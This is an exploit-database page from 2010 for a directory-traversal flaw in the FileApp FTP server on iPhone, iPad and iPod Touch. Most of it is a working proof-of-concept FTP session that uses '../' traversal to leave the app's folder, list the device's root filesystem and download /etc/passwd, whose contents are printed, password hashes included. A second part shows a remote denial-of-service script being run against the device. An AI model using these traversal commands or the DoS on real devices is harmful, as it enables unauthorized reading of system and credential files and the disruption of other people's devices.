[remote exploits] - FileApp < 2.0 for iPhone, iPad and iP

Posted on 02 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>FileApp &lt; 2.0 for iPhone, iPad and iPod Touch Directory Traversal | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='FileApp &lt; 2.0 for iPhone, iPad and iPod Touch Directory Traversal by m0ebiusc0de in remote exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>=================================================================
FileApp &lt; 2.0 for iPhone, iPad and iPod Touch Directory Traversal
=================================================================

# Title : FileApp &lt; 2.0 directory traversal for iPhone,iPod,iPad
# Date : 02/10/2010
# Author : m0ebiusc0de
# Software : http://www.digidna.net/products/fileapp/download
# Version : FileApp &lt; v.2.0, iPad 3.2.2 (jailed)
# Tested on : Windows XP PRO SP3
 
[+][+] 0x01. Directory Traversal PoC [+][+]
 
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
 
C:Documents and SettingsAdministrator&gt;ftp
ftp&gt; open
To 192.168.1.100 2121
Connected to 192.168.1.100.
220 FileApp - FTP Server
User (192.168.1.100:(none)):
331 Password please.
Password:
230 User logged in.
ftp&gt; dir
200 PORT 192.168.1.106:46885 OK
150 BINARY data connection established.
drwxr-xr-x   2 501      501      1564 Sep 29 18:10 Start Here
-rw-r--r--   1 501      501      1335 Sep 29 13:42 a.html
226 Directory list has been submitted.
ftp: 122 bytes received in 0.00Seconds 122000.00Kbytes/sec.
ftp&gt; cd ../../../../../../
250 OK
ftp&gt; dir
200 PORT 192.168.1.106:46887 OK
150 BINARY data connection established.
drwxrwxr-x  19 0        80       646 Aug  5 14:18 Applications
drwxrwxr-x   2 0        80       68 May 29 08:51 Developer
drwxrwxr-x  15 0        80       646 Aug  5 14:18 Library
drwxr-xr-x   3 0        0        102 May 29 08:56 System
drwxr-xr-x   2 0        0        102 Aug  5 14:23 bin
drwxrwxr-x   2 0        80       68 Jan 16 03:56 cores
dr-xr-xr-x   3 0        0        1353 Oct  2 17:58 dev
lrwxrwxrwx   1 0        80       11 Aug  5 14:18 etc -&gt; private/etc
drwxr-xr-x   4 0        0        136 Sep 12 20:06 private
drwxr-xr-x   2 0        0        442 Aug  5 14:23 sbin
drwxr-xr-x   7 0        0        238 Aug  5 14:11 usr
lrwxrwxrwx   1 0        80       11 Aug  5 14:18 var -&gt; private/var
226 Directory list has been submitted.
ftp: 716 bytes received in 0.02Seconds 44.75Kbytes/sec.
ftp&gt; cd ../../../../../../etc/
250 OK
ftp&gt; dir
200 PORT 192.168.1.106:46888 OK
150 BINARY data connection established.
drwxr-xr-x   2 0        0        272 May 29 09:06 bluetool
-rw-r--r--   1 0        0        78 Sep 12 20:06 fstab
-rw-r--r--   1 0        0        1262 Jan 16 03:56 group
-rw-r--r--   1 0        0        236 Jan 16 03:56 hosts
-rw-r--r--   1 0        0        0 Jan 16 03:56 hosts.equiv
-rw-r--r--   1 0        0        53 Jan 16 03:56 networks
-rw-r--r--   1 0        0        132 May 29 07:12 notify.conf
-rw-r--r--   1 0        0        611 Jan 16 03:56 passwd
drwxr-xr-x   2 0        0        68 Aug  5 10:15 ppp
-rw-r--r--   1 0        0        5766 Jan 16 03:56 protocols
drwxr-xr-x   3 0        0        170 May 29 08:03 racoon
-rw-r--r--   1 0        0        677959 Jan 16 03:56 services
-rw-r--r--   1 0        0        1367 Jan 16 03:56 ttys
226 Directory list has been submitted.
ftp: 766 bytes received in 0.02Seconds 47.88Kbytes/sec.
ftp&gt; get ../../../../../../etc/passwd
200 PORT 192.168.1.106:46894 OK
150 BINARY data connection established.
226 File transmission successful.
ftp: 611 bytes received in 0.00Seconds 611000.00Kbytes/sec.
ftp&gt; quit
221 Thanks for using FileApp !
 
C:Documents and SettingsAdministrator&gt;cat passwd
##
# User Database
#
# This file is the authoritative user database.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh
mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/empty:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
 
C:Documents and SettingsAdministrator&gt;
 
[+][+] 0x02. Remote DoS PoC TEST [+][+]
 
C:Python25&gt;python FileApp_DoS.py 192.168.1.100
[+] Connecting to the target..
[+] Exploited!
 
C:Python25&gt;python FileApp_DoS.py 192.168.1.100
[-] Connection error!
 
C:Python25&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-02]</pre></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20